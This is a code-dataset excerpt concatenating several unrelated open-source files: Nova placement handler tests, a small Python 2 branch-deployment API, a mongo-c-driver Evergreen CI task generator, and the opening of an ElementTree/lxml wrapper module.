'/hello': {'GET': 'hello'}
}
self.mapper = handler.make_map(declarations)
def test_no_match(self):
environ = _environ(path='/cow')
self.assertIsNone(self.mapper.match(environ=environ))
def test_match(self):
environ = _environ(path='/hello')
action = self.mapper.match(environ=environ)['action']
self.assertEqual('hello', action)
def test_405_methods(self):
environ = _environ(path='/hello', method='POST')
result = self.mapper.match(environ=environ)
self.assertEqual(handler.handle_405, result['action'])
self.assertEqual('GET', result['_methods'])
def test_405_headers(self):
environ = _environ(path='/hello', method='POST')
global headers, status
headers = status = None
def local_start_response(*args, **kwargs):
global headers, status
status = args[0]
headers = {header[0]: header[1] for header in args[1]}
handler.dispatch(environ, local_start_response, self.mapper)
allow_header = headers['allow']
self.assertEqual('405 Method Not Allowed', status)
self.assertEqual('GET', allow_header)
# PEP 3333 requires that headers be whatever the native str
# is in that version of Python. Never unicode.
self.assertEqual(str, type(allow_header))
class PlacementLoggingTest(test.NoDBTestCase):
@mock.patch("nova.api.openstack.placement.handler.LOG")
def test_404_no_error_log(self, mocked_log):
environ = _environ(path='/hello', method='GET')
context_mock = mock.Mock()
context_mock.to_policy_values.return_value = {'roles': ['admin']}
environ['placement.context'] = context_mock
app = handler.PlacementHandler()
self.assertRaises(webob.exc.HTTPNotFound,
app, environ, start_response)
mocked_log.error.assert_not_called()
mocked_log.exception.assert_not_called()
class DeclarationsTest(test.NoDBTestCase):
def setUp(self):
super(DeclarationsTest, self).setUp()
self.mapper = handler.make_map(handler.ROUTE_DECLARATIONS)
def test_root_slash_match(self):
environ = _environ(path='/')
result = self.mapper.match(environ=environ)
self.assertEqual(root.home, result['action'])
def test_root_empty_match(self):
environ = _environ(path='')
result = self.mapper.match(environ=environ)
self.assertEqual(root.home, result['action'])
class ContentHeadersTest(test.NoDBTestCase):
def setUp(self):
super(ContentHeadersTest, self).setUp()
self.environ = _environ(path='/')
self.app = handler.PlacementHandler()
def test_no_content_type(self):
self.environ['CONTENT_LENGTH'] = '10'
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-type header required when "
"content-length > 0", self.app,
self.environ, start_response)
def test_non_integer_content_length(self):
self.environ['CONTENT_LENGTH'] = 'foo'
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-length header must be an integer",
self.app, self.environ, start_response)
def test_empty_content_type(self):
self.environ['CONTENT_LENGTH'] = '10'
self.environ['CONTENT_TYPE'] = ''
self.assertRaisesRegex(webob.exc.HTTPBadRequest,
"content-type header required when "
"content-length > 0", self.app,
self.environ, start_response)
def test_empty_content_length_and_type_works(self):
self.environ['CONTENT_LENGTH'] = ''
self.environ['CONTENT_TYPE'] = ''
self.app(self.environ, start_response)
def test_content_length_and_type_works(self):
self.environ['CONTENT_LENGTH'] = '10'
self.environ['CONTENT_TYPE'] = 'foo'
self.app(self.environ, start_response)
| apache-2.0 | -6,712,546,996,518,206,000 | 36.231959 | 78 | 0.618856 | false |
stianstr/autodeploy | autodeploy/Api.py | 1 | 3374 | from DependencyContainer import DependencyContainer
from Deployer import AlreadyDeployed
import traceback
dc = DependencyContainer()
# Step 1 - Check if branch can be deployed
def check(branch, server, user, internalCheck=False):
checker = dc.getDeploymentChecker(server)
result = checker.check(branch)
if not internalCheck:
result = {'check': result, 'result': result['result']}
result['id'] = writeResult('check', branch, server, result, user)
return result
# Step 2 - Deploy branch (then observe if everything is ok)
def deploy(branch, server, user):
result = {}
try:
checkDetails = check(branch, server, user, internalCheck=True)
if not checkDetails['result']:
result = {
'result': False,
'message': 'Check failed',
'check': checkDetails,
'exception': None
}
else:
deployer = dc.getDeployer(server)
try:
deployer.deploy(branch)
result = {
'result': True,
'msesage': 'Deployed',
'exception': None,
'check': checkDetails
}
except AlreadyDeployed, e:
result = {
'result': False,
'message': 'Already deployed',
'exception': None,
'check': {}
}
except Exception, e:
result = {
'result': False,
'message': e.message,
'exception': traceback.format_exc(),
'check': {}
}
result['id'] = writeResult('deploy', branch, server, result, user)
return result
# Step 3 - Merge branch into master and switch server to master
def merge(branch, server, user):
# todo: sanity-check
lister = dc.getBranchLister()
if not lister.exists(branch):
result = {'check': {}, 'result': False, 'message': 'No such branch'}
else:
try:
merger = dc.getBranchMerger()
merger.merge(branch)
deployer = dc.getDeployer(server)
deployer.deploy('master')
result = {'check': {}, 'result': True}
except Exception, e:
result = {'check': {}, 'result': False}
_exceptionToResult(e, result)
result['id'] = writeResult('merge', branch, server, result, user)
return result
# meh, duplicated elsewhere
def _exceptionToResult(exception, result):
lines = exception.message.split('\n')
for line in lines:
line = line.strip()
if line:
result['message'] = line
break
#result['exception'] = '%s: %s' % (exception.__class__, exception.message)
result['exception'] = traceback.format_exc()
def getServers():
servers = dc.config['servers']
for server in servers:
bc = dc.getRemoteBranchChecker(server['alias'])
server['branch'] = bc.get()
return servers
def getBranches():
bl = dc.getBranchLister()
return bl.list()
def writeResult(type, branch, server, data, user):
data['user'] = user
data['type'] = type
data['branch'] = branch
data['server'] = server
print 'DATA: %s' % data
o = dc.getResultWriter()
return o.write(data)
| mit | 2,985,443,141,897,539,600 | 29.396396 | 78 | 0.546829 | false |
derickr/mongo-c-driver | build/evergreen_config_lib/tasks.py | 1 | 29912 | # Copyright 2018-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict as OD
from itertools import chain
try:
# Python 3 abstract base classes.
import collections.abc as abc
except ImportError:
import collections as abc
from evergreen_config_generator.functions import (
bootstrap, func, run_tests, s3_put)
from evergreen_config_generator.tasks import (
both_or_neither, FuncTask, MatrixTask, NamedTask, prohibit, require, Task)
from evergreen_config_lib import shell_mongoc
class CompileTask(NamedTask):
def __init__(self, task_name, tags=None, config='debug',
compression='default', continue_on_err=False,
extra_commands=None, depends_on=None, **kwargs):
super(CompileTask, self).__init__(task_name=task_name,
depends_on=depends_on,
tags=tags,
**kwargs)
self.extra_commands = extra_commands or []
# Environment variables for .evergreen/compile.sh.
self.compile_sh_opt = kwargs
if config == 'debug':
self.compile_sh_opt['DEBUG'] = 'ON'
else:
assert config == 'release'
self.compile_sh_opt['RELEASE'] = 'ON'
if compression != 'default':
self.compile_sh_opt['SNAPPY'] = (
'ON' if compression in ('all', 'snappy') else 'OFF')
self.compile_sh_opt['ZLIB'] = (
'BUNDLED' if compression in ('all', 'zlib') else 'OFF')
self.continue_on_err = continue_on_err
def to_dict(self):
task = super(CompileTask, self).to_dict()
script = ''
for opt, value in sorted(self.compile_sh_opt.items()):
script += 'export %s="%s"\n' % (opt, value)
script += "CC='${CC}' MARCH='${MARCH}' sh .evergreen/compile.sh"
task['commands'].append(shell_mongoc(script))
task['commands'].append(func('upload build'))
task['commands'].extend(self.extra_commands)
return task
class SpecialTask(CompileTask):
def __init__(self, *args, **kwargs):
super(SpecialTask, self).__init__(*args, **kwargs)
self.add_tags('special')
class LinkTask(NamedTask):
def __init__(self, task_name, extra_commands, orchestration=True, **kwargs):
if orchestration == 'ssl':
bootstrap_commands = [bootstrap(SSL=1)]
elif orchestration:
bootstrap_commands = [bootstrap()]
else:
bootstrap_commands = []
super(LinkTask, self).__init__(
task_name=task_name,
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=bootstrap_commands + extra_commands,
**kwargs)
all_tasks = [
NamedTask('check-public-headers',
commands=[shell_mongoc('sh ./.evergreen/check-public-headers.sh')]),
FuncTask('make-release-archive',
'release archive', 'upload docs', 'upload man pages',
'upload release', 'upload build'),
CompileTask('hardened-compile',
tags=['hardened'],
compression=None,
CFLAGS='-fno-strict-overflow -D_FORTIFY_SOURCE=2 -fstack-protector-all -fPIE -O',
LDFLAGS='-pie -Wl,-z,relro -Wl,-z,now'),
FuncTask('abi-compliance-check', 'abi report'),
CompileTask('debug-compile-compression-zlib',
tags=['zlib', 'compression'],
compression='zlib'),
CompileTask('debug-compile-compression-snappy',
tags=['snappy', 'compression'],
compression='snappy'),
CompileTask('debug-compile-compression',
tags=['zlib', 'snappy', 'compression'],
compression='all'),
CompileTask('debug-compile-no-align',
tags=['debug-compile'],
compression='zlib',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF"),
CompileTask('debug-compile-nosasl-nossl',
tags=['debug-compile', 'nosasl', 'nossl']),
CompileTask('debug-compile-lto', CFLAGS='-flto'),
CompileTask('debug-compile-lto-thin', CFLAGS='-flto=thin'),
SpecialTask('debug-compile-c11',
tags=['debug-compile', 'c11', 'stdflags'],
CFLAGS='-std=c11 -D_XOPEN_SOURCE=600'),
SpecialTask('debug-compile-c99',
tags=['debug-compile', 'c99', 'stdflags'],
CFLAGS='-std=c99 -D_XOPEN_SOURCE=600'),
SpecialTask('debug-compile-c89',
tags=['debug-compile', 'c89', 'stdflags'],
CFLAGS='-std=c89 -D_POSIX_C_SOURCE=200112L -pedantic'),
SpecialTask('debug-compile-valgrind',
tags=['debug-compile', 'valgrind'],
SASL='OFF',
SSL='OPENSSL',
VALGRIND='ON',
CFLAGS='-DBSON_MEMCHECK'),
SpecialTask('debug-compile-coverage',
tags=['debug-compile', 'coverage'],
COVERAGE='ON',
extra_commands=[func('upload coverage')]),
CompileTask('debug-compile-no-counters',
tags=['debug-compile', 'no-counters'],
ENABLE_SHM_COUNTERS='OFF'),
SpecialTask('debug-compile-asan-clang',
tags=['debug-compile', 'asan-clang'],
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=address -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS='-DENABLE_EXTRA_ALIGNMENT=OFF',
PATH='/usr/lib/llvm-3.8/bin:$PATH'),
# include -pthread in CFLAGS on gcc to address the issue explained here:
# https://groups.google.com/forum/#!topic/address-sanitizer/JxnwgrWOLuc
SpecialTask('debug-compile-asan-gcc',
compression='zlib',
CFLAGS='-fsanitize=address -pthread',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF"),
SpecialTask('debug-compile-asan-clang-openssl',
tags=['debug-compile', 'asan-clang'],
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=address -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF",
PATH='/usr/lib/llvm-3.8/bin:$PATH',
SSL='OPENSSL'),
SpecialTask('debug-compile-ubsan',
compression='zlib',
CC='clang-3.8',
CFLAGS='-fsanitize=undefined -fno-omit-frame-pointer'
' -DBSON_MEMCHECK',
CHECK_LOG='ON',
EXTRA_CONFIGURE_FLAGS="-DENABLE_EXTRA_ALIGNMENT=OFF",
PATH='/usr/lib/llvm-3.8/bin:$PATH'),
SpecialTask('debug-compile-scan-build',
tags=['clang', 'debug-compile', 'scan-build'],
continue_on_err=True,
ANALYZE='ON',
CC='clang',
extra_commands=[
func('upload scan artifacts'),
shell_mongoc('''
if find scan -name \*.html | grep -q html; then
exit 123
fi''')]),
CompileTask('compile-tracing',
TRACING='ON'),
CompileTask('release-compile',
config='release',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')])),
CompileTask('debug-compile-nosasl-openssl',
tags=['debug-compile', 'nosasl', 'openssl'],
SSL='OPENSSL'),
CompileTask('debug-compile-nosasl-darwinssl',
tags=['debug-compile', 'nosasl', 'darwinssl'],
SSL='DARWIN'),
CompileTask('debug-compile-nosasl-winssl',
tags=['debug-compile', 'nosasl', 'winssl'],
SSL='WINDOWS'),
CompileTask('debug-compile-sasl-nossl',
tags=['debug-compile', 'sasl', 'nossl'],
SASL='AUTO',
SSL='OFF'),
CompileTask('debug-compile-sasl-openssl',
tags=['debug-compile', 'sasl', 'openssl'],
SASL='AUTO',
SSL='OPENSSL'),
CompileTask('debug-compile-sasl-darwinssl',
tags=['debug-compile', 'sasl', 'darwinssl'],
SASL='AUTO',
SSL='DARWIN'),
CompileTask('debug-compile-sasl-winssl',
tags=['debug-compile', 'sasl', 'winssl'],
SASL='AUTO',
SSL='WINDOWS'),
CompileTask('debug-compile-sspi-nossl',
tags=['debug-compile', 'sspi', 'nossl'],
SASL='SSPI',
SSL='OFF'),
CompileTask('debug-compile-sspi-openssl',
tags=['debug-compile', 'sspi', 'openssl'],
SASL='SSPI',
SSL='OPENSSL'),
CompileTask('debug-compile-rdtscp',
ENABLE_RDTSCP='ON'),
CompileTask('debug-compile-sspi-winssl',
tags=['debug-compile', 'sspi', 'winssl'],
SASL='SSPI',
SSL='WINDOWS'),
CompileTask('debug-compile-nosrv',
tags=['debug-compile'],
SRV='OFF'),
LinkTask('link-with-cmake',
extra_commands=[
func('link sample program', BUILD_SAMPLE_WITH_CMAKE=1)]),
LinkTask('link-with-cmake-ssl',
extra_commands=[
func('link sample program',
BUILD_SAMPLE_WITH_CMAKE=1,
ENABLE_SSL=1)]),
LinkTask('link-with-cmake-snappy',
extra_commands=[
func('link sample program',
BUILD_SAMPLE_WITH_CMAKE=1,
ENABLE_SNAPPY=1)]),
LinkTask('link-with-cmake-mac',
extra_commands=[
func('link sample program', BUILD_SAMPLE_WITH_CMAKE=1)]),
LinkTask('link-with-cmake-windows',
extra_commands=[func('link sample program MSVC')]),
LinkTask('link-with-cmake-windows-ssl',
extra_commands=[func('link sample program MSVC', ENABLE_SSL=1)],
orchestration='ssl'),
LinkTask('link-with-cmake-windows-snappy',
extra_commands=[
func('link sample program MSVC', ENABLE_SNAPPY=1)]),
LinkTask('link-with-cmake-mingw',
extra_commands=[func('link sample program mingw')]),
LinkTask('link-with-pkg-config',
extra_commands=[func('link sample program')]),
LinkTask('link-with-pkg-config-mac',
extra_commands=[func('link sample program')]),
LinkTask('link-with-pkg-config-ssl',
extra_commands=[func('link sample program', ENABLE_SSL=1)]),
LinkTask('link-with-bson',
extra_commands=[func('link sample program bson')],
orchestration=False),
LinkTask('link-with-bson-mac',
extra_commands=[func('link sample program bson')],
orchestration=False),
LinkTask('link-with-bson-windows',
extra_commands=[func('link sample program MSVC bson')],
orchestration=False),
LinkTask('link-with-bson-mingw',
extra_commands=[func('link sample program mingw bson')],
orchestration=False),
NamedTask('debian-package-build',
commands=[
shell_mongoc('export IS_PATCH="${is_patch}"\n'
'sh .evergreen/debian_package_build.sh'),
s3_put(local_file='deb.tar.gz',
remote_file='${branch_name}/mongo-c-driver-debian-packages-${CURRENT_VERSION}.tar.gz',
content_type='${content_type|application/x-gzip}')]),
NamedTask('rpm-package-build',
commands=[
shell_mongoc('sh .evergreen/build_snapshot_rpm.sh'),
s3_put(local_file='rpm.tar.gz',
remote_file='${branch_name}/mongo-c-driver-rpm-packages-${CURRENT_VERSION}.tar.gz',
content_type='${content_type|application/x-gzip}')]),
NamedTask('install-uninstall-check-mingw',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
export CC="C:/mingw-w64/x86_64-4.9.1-posix-seh-rt_v3-rev1/mingw64/bin/gcc.exe"
BSON_ONLY=1 cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd
cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd''')]),
NamedTask('install-uninstall-check-msvc',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
export CC="Visual Studio 14 2015 Win64"
BSON_ONLY=1 cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd
cmd.exe /c .\\.evergreen\\install-uninstall-check-windows.cmd''')]),
NamedTask('install-uninstall-check',
depends_on=OD([('name', 'make-release-archive'),
('variant', 'releng')]),
commands=[shell_mongoc(r'''
DESTDIR="$(pwd)/dest" sh ./.evergreen/install-uninstall-check.sh
BSON_ONLY=1 sh ./.evergreen/install-uninstall-check.sh
sh ./.evergreen/install-uninstall-check.sh''')]),
]
class IntegrationTask(MatrixTask):
axes = OD([('valgrind', ['valgrind', False]),
('asan', ['asan', False]),
('coverage', ['coverage', False]),
('version', ['latest', '4.0', '3.6', '3.4', '3.2', '3.0']),
('topology', ['server', 'replica_set', 'sharded_cluster']),
('auth', [True, False]),
('sasl', ['sasl', 'sspi', False]),
('ssl', ['openssl', 'darwinssl', 'winssl', False])])
def __init__(self, *args, **kwargs):
super(IntegrationTask, self).__init__(*args, **kwargs)
if self.valgrind:
self.add_tags('test-valgrind')
self.options['exec_timeout_secs'] = 7200
elif self.coverage:
self.add_tags('test-coverage')
self.options['exec_timeout_secs'] = 3600
elif self.asan:
self.add_tags('test-asan')
self.options['exec_timeout_secs'] = 3600
else:
self.add_tags(self.topology,
self.version,
self.display('ssl'),
self.display('sasl'),
self.display('auth'))
# E.g., test-latest-server-auth-sasl-ssl needs debug-compile-sasl-ssl.
# Coverage tasks use a build function instead of depending on a task.
if self.valgrind:
self.add_dependency('debug-compile-valgrind')
elif self.asan and self.ssl:
self.add_dependency('debug-compile-asan-clang-%s' % (
self.display('ssl'),))
elif self.asan:
self.add_dependency('debug-compile-asan-clang')
elif not self.coverage:
self.add_dependency('debug-compile-%s-%s' % (
self.display('sasl'), self.display('ssl')))
@property
def name(self):
def name_part(axis_name):
part = self.display(axis_name)
if part == 'replica_set':
return 'replica-set'
elif part == 'sharded_cluster':
return 'sharded'
return part
return self.name_prefix + '-' + '-'.join(
name_part(axis_name) for axis_name in self.axes
if getattr(self, axis_name) or axis_name in ('auth', 'sasl', 'ssl'))
def to_dict(self):
task = super(IntegrationTask, self).to_dict()
commands = task['commands']
if self.depends_on:
commands.append(
func('fetch build', BUILD_NAME=self.depends_on['name']))
if self.coverage:
commands.append(func('debug-compile-coverage-notest-%s-%s' % (
self.display('sasl'), self.display('ssl')
)))
commands.append(bootstrap(VERSION=self.version,
TOPOLOGY=self.topology,
AUTH='auth' if self.auth else 'noauth',
SSL=self.display('ssl')))
commands.append(run_tests(VALGRIND=self.on_off('valgrind'),
ASAN=self.on_off('asan'),
AUTH=self.display('auth'),
SSL=self.display('ssl')))
if self.coverage:
commands.append(func('update codecov.io'))
return task
def _check_allowed(self):
if self.valgrind:
prohibit(self.asan)
prohibit(self.sasl)
require(self.ssl in ('openssl', False))
prohibit(self.coverage)
# Valgrind only with auth+SSL or no auth + no SSL.
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
if self.auth:
require(self.ssl)
if self.sasl == 'sspi':
# Only one self.
require(self.topology == 'server')
require(self.version == 'latest')
require(self.ssl == 'winssl')
require(self.auth)
if not self.ssl:
prohibit(self.sasl)
if self.coverage:
prohibit(self.sasl)
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
if self.asan:
prohibit(self.sasl)
prohibit(self.coverage)
# Address sanitizer only with auth+SSL or no auth + no SSL.
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
all_tasks = chain(all_tasks, IntegrationTask.matrix())
class DNSTask(MatrixTask):
axes = OD([('auth', [False, True]),
('ssl', ['openssl', 'winssl', 'darwinssl'])])
name_prefix = 'test-dns'
def __init__(self, *args, **kwargs):
super(DNSTask, self).__init__(*args, **kwargs)
sasl = 'sspi' if self.ssl == 'winssl' else 'sasl'
self.add_dependency('debug-compile-%s-%s' % (sasl, self.display('ssl')))
@property
def name(self):
return self.name_prefix + '-' + '-'.join(
self.display(axis_name) for axis_name in self.axes
if getattr(self, axis_name))
def to_dict(self):
task = super(MatrixTask, self).to_dict()
commands = task['commands']
commands.append(
func('fetch build', BUILD_NAME=self.depends_on['name']))
orchestration = bootstrap(TOPOLOGY='replica_set',
AUTH='auth' if self.auth else 'noauth',
SSL='ssl')
if self.auth:
orchestration['vars']['AUTHSOURCE'] = 'thisDB'
orchestration['vars']['ORCHESTRATION_FILE'] = 'auth-thisdb-ssl'
commands.append(orchestration)
commands.append(run_tests(SSL='ssl',
AUTH=self.display('auth'),
DNS='dns-auth' if self.auth else 'on'))
return task
all_tasks = chain(all_tasks, DNSTask.matrix())
class CompressionTask(MatrixTask):
axes = OD([('compression', ['zlib', 'snappy', 'compression'])])
name_prefix = 'test-latest-server'
def __init__(self, *args, **kwargs):
super(CompressionTask, self).__init__(*args, **kwargs)
self.add_dependency('debug-compile-' + self._compressor_suffix())
self.add_tags('compression', 'latest')
self.add_tags(*self._compressor_list())
@property
def name(self):
return self.name_prefix + '-' + self._compressor_suffix()
def to_dict(self):
task = super(CompressionTask, self).to_dict()
commands = task['commands']
commands.append(func('fetch build', BUILD_NAME=self.depends_on['name']))
if self.compression == 'compression':
orchestration_file = 'snappy-zlib'
else:
orchestration_file = self.compression
commands.append(bootstrap(
AUTH='noauth',
SSL='nossl',
ORCHESTRATION_FILE=orchestration_file))
commands.append(run_tests(
AUTH='noauth',
SSL='nossl',
COMPRESSORS=','.join(self._compressor_list())))
return task
def _compressor_suffix(self):
if self.compression == 'zlib':
return 'compression-zlib'
elif self.compression == 'snappy':
return 'compression-snappy'
else:
return 'compression'
def _compressor_list(self):
if self.compression == 'zlib':
return ['zlib']
elif self.compression == 'snappy':
return ['snappy']
else:
return ['snappy', 'zlib']
all_tasks = chain(all_tasks, CompressionTask.matrix())
class SpecialIntegrationTask(NamedTask):
def __init__(self, task_name, depends_on='debug-compile-sasl-openssl',
extra_commands=None, uri=None,
tags=None, version='latest', topology='server'):
commands = [func('fetch build', BUILD_NAME=depends_on),
bootstrap(VERSION=version, TOPOLOGY=topology),
run_tests(uri)] + (extra_commands or [])
super(SpecialIntegrationTask, self).__init__(task_name,
commands=commands,
depends_on=depends_on,
tags=tags)
all_tasks = chain(all_tasks, [
# Verify that retryWrites=true is ignored with standalone.
SpecialIntegrationTask('retry-true-latest-server',
uri='mongodb://localhost/?retryWrites=true'),
# Verify that retryWrites=true is ignored with old server.
SpecialIntegrationTask('retry-true-3.4-replica-set',
version='3.4',
topology='replica_set'),
SpecialIntegrationTask('test-latest-server-hardened',
'hardened-compile',
tags=['hardened', 'latest']),
])
class AuthTask(MatrixTask):
axes = OD([('sasl', ['sasl', 'sspi', False]),
('ssl', ['openssl', 'darwinssl', 'winssl'])])
name_prefix = 'authentication-tests'
def __init__(self, *args, **kwargs):
super(AuthTask, self).__init__(*args, **kwargs)
self.add_tags('authentication-tests',
self.display('ssl'),
self.display('sasl'))
self.add_dependency('debug-compile-%s-%s' % (
self.display('sasl'), self.display('ssl')))
self.commands.extend([
func('fetch build', BUILD_NAME=self.depends_on['name']),
func('run auth tests')])
@property
def name(self):
rv = self.name_prefix + '-' + self.display('ssl')
if self.sasl:
return rv
else:
return rv + '-nosasl'
def _check_allowed(self):
both_or_neither(self.ssl == 'winssl', self.sasl == 'sspi')
if not self.sasl:
require(self.ssl == 'openssl')
all_tasks = chain(all_tasks, AuthTask.matrix())
class PostCompileTask(NamedTask):
def __init__(self, *args, **kwargs):
super(PostCompileTask, self).__init__(*args, **kwargs)
self.commands.insert(
0, func('fetch build', BUILD_NAME=self.depends_on['name']))
all_tasks = chain(all_tasks, [
PostCompileTask(
'test-valgrind-memcheck-mock-server',
tags=['test-valgrind'],
depends_on='debug-compile-valgrind',
commands=[func('run mock server tests', VALGRIND='on', SSL='ssl')]),
PostCompileTask(
'test-asan-memcheck-mock-server',
tags=['test-asan'],
depends_on='debug-compile-asan-clang',
commands=[func('run mock server tests', ASAN='on', SSL='ssl')]),
# Compile with a function, not a task: gcov files depend on the absolute
# path of the executable, so we can't compile as a separate task.
NamedTask(
'test-coverage-mock-server',
tags=['test-coverage'],
commands=[func('debug-compile-coverage-notest-nosasl-openssl'),
func('run mock server tests', SSL='ssl'),
func('update codecov.io')]),
NamedTask(
'test-coverage-latest-server-dns',
tags=['test-coverage'],
exec_timeout_secs=3600,
commands=[func('debug-compile-coverage-notest-nosasl-openssl'),
bootstrap(TOPOLOGY='replica_set', AUTH='auth', SSL='ssl'),
run_tests(AUTH='auth', SSL='ssl', DNS='on'),
func('update codecov.io')]),
NamedTask(
'authentication-tests-memcheck',
tags=['authentication-tests', 'valgrind'],
exec_timeout_seconds=3600,
commands=[
shell_mongoc("""
VALGRIND=ON DEBUG=ON CC='${CC}' MARCH='${MARCH}' SASL=AUTO \
SSL=OPENSSL CFLAGS='-DBSON_MEMCHECK' sh .evergreen/compile.sh
"""),
func('run auth tests', valgrind='true')]),
])
class SSLTask(Task):
def __init__(self, version, patch, cflags=None, fips=False, **kwargs):
full_version = version + patch + ('-fips' if fips else '')
script = ''
if cflags:
script += 'export CFLAGS=%s\n' % (cflags,)
script += "DEBUG=ON CC='${CC}' MARCH='${MARCH}' SASL=OFF"
if 'libressl' in version:
script += " SSL=LIBRESSL"
else:
script += " SSL=OPENSSL"
if fips:
script += " OPENSSL_FIPS=1"
script += " sh .evergreen/compile.sh"
super(SSLTask, self).__init__(commands=[
func('install ssl', SSL=full_version),
shell_mongoc(script),
func('run auth tests', **kwargs),
func('upload build')])
self.version = version
self.fips = fips
@property
def name(self):
s = 'build-and-run-authentication-tests-' + self.version
if self.fips:
return s + '-fips'
return s
all_tasks = chain(all_tasks, [
SSLTask('openssl-0.9.8', 'zh', obsolete_tls=True),
SSLTask('openssl-1.0.0', 't', obsolete_tls=True),
SSLTask('openssl-1.0.1', 'u', cflags='-Wno-redundant-decls'),
SSLTask('openssl-1.0.1', 'u', cflags='-Wno-redundant-decls', fips=True),
SSLTask('openssl-1.0.2', 'l'),
SSLTask('openssl-1.1.0', 'f'),
SSLTask('libressl-2.5', '.2', require_tls12=True),
NamedTask('compile-libmongocapi',
commands=[shell_mongoc(r'''
. ./.evergreen/find-cmake.sh
${setup_android_toolchain|}
export ${libmongocapi_compile_env|}
mkdir cmake-build-libmongocapi
$CMAKE \
-DCMAKE_INSTALL_PREFIX=cmake-build-libmongocapi \
-DENABLE_SNAPPY=OFF \
-DENABLE_AUTOMATIC_INIT_AND_CLEANUP=OFF \
-DENABLE_ZLIB=OFF -DENABLE_SSL=OFF \
-DENABLE_SASL=OFF \
-DENABLE_TESTS=OFF \
-DENABLE_SRV=OFF \
-DENABLE_EXAMPLES=OFF \
-DENABLE_STATIC=OFF \
-DENABLE_SHM_COUNTERS=OFF \
${libmongocapi_cmake_flags}
make install VERBOSE=1''')]),
])
class IPTask(MatrixTask):
axes = OD([('client', ['ipv6', 'ipv4', 'localhost']),
('server', ['ipv6', 'ipv4'])])
name_prefix = 'test-latest'
def __init__(self, *args, **kwargs):
super(IPTask, self).__init__(*args, **kwargs)
self.add_tags('nossl', 'nosasl', 'server', 'ipv4-ipv6', 'latest')
self.add_dependency('debug-compile-nosasl-nossl')
self.commands.extend([
func('fetch build', BUILD_NAME=self.depends_on['name']),
bootstrap(IPV4_ONLY=self.on_off(server='ipv4')),
run_tests(IPV4_ONLY=self.on_off(server='ipv4'),
URI={'ipv6': 'mongodb://[::1]/',
'ipv4': 'mongodb://127.0.0.1/',
'localhost': 'mongodb://localhost/'}[self.client])])
def display(self, axis_name):
return axis_name + '-' + getattr(self, axis_name)
@property
def name(self):
return '-'.join([
self.name_prefix, self.display('server'), self.display('client'),
'noauth', 'nosasl', 'nossl'])
def _check_allowed(self):
# This would fail by design.
if self.server == 'ipv4':
prohibit(self.client == 'ipv6')
# Default configuration is tested in other variants.
if self.server == 'ipv6':
prohibit(self.client == 'localhost')
all_tasks = chain(all_tasks, IPTask.matrix())
all_tasks = list(all_tasks)
| apache-2.0 | 7,362,404,252,155,893,000 | 38.618543 | 111 | 0.533766 | false |
windskyer/k_nova | nova_extension/compute/ibm/etree_wrapper.py | 1 | 4367 | # =================================================================
# =================================================================
"""Wrapper around ElementTree, using either the native implementation or lxml.
This module creates a wrapper around the ElementTree library, picking an
appropriate implementation for the environment.
This module normalizes:
* the exception when parsing, normalized to ParseError
* lxml doesn't support unicode strings with encoding, so lxml converts unicode
document to ascii.
Reasons to use this:
* not all systems have the lxml library
* Python 2.6's native ElementTree has minimal support for XPATH.
This module uses the following rule to pick the implementation:
* If using Python 2.7, uses the native implementation.
* Otherwise, if lxml is available, uses the lxml implementation.
* Otherwise, uses the native implementation.
(In this case, XPATH support will be minimal).
References:
* Python 2.7 native:
http://docs.python.org/2.7/library/xml.etree.elementtree.html
* Python 2.6 native:
http://docs.python.org/2.6/library/xml.etree.elementtree.html
* lxml: http://lxml.de/
To use this module:
import etree_wrapper
etree_wrapper.XML(some_xml_string)
If the XML string passed to XML() is not valid, a ParseError is raised.
"""
import sys
class ParseError(Exception):
"""Raised if the XML string could not be parsed."""
pass
class _NativeImpl:
def XML(self, raw_str):
from xml.etree import ElementTree
try:
from xml.etree.ElementTree \
import ParseError as ImplParseError # noqa
except ImportError:
from xml.parsers.expat import ExpatError as ImplParseError # noqa
try:
return ElementTree.XML(raw_str)
except ImplParseError as e:
raise ParseError(e)
def SubElement(self, parent, tag, attrib={}, **extra):
from xml.etree import ElementTree
return ElementTree.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(self, element):
from xml.etree import ElementTree
return ElementTree.tostring(element)
def register_namespace(self, prefix, namespace):
from xml.etree import ElementTree
return ElementTree.register_namespace(prefix, namespace)
class _LxmlImpl:
def XML(self, raw_str):
from lxml import etree
# lxml does not support parsing a unicode string that has an encoding
# value, so we convert a unicode string to ascii.
raw_str_ascii = raw_str.encode('ascii', 'replace')
try:
return etree.XML(raw_str_ascii)
except etree.XMLSyntaxError as e:
raise ParseError(e)
def SubElement(self, parent, tag, attrib={}, **extra):
from lxml import etree
return etree.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(self, element):
from lxml import etree
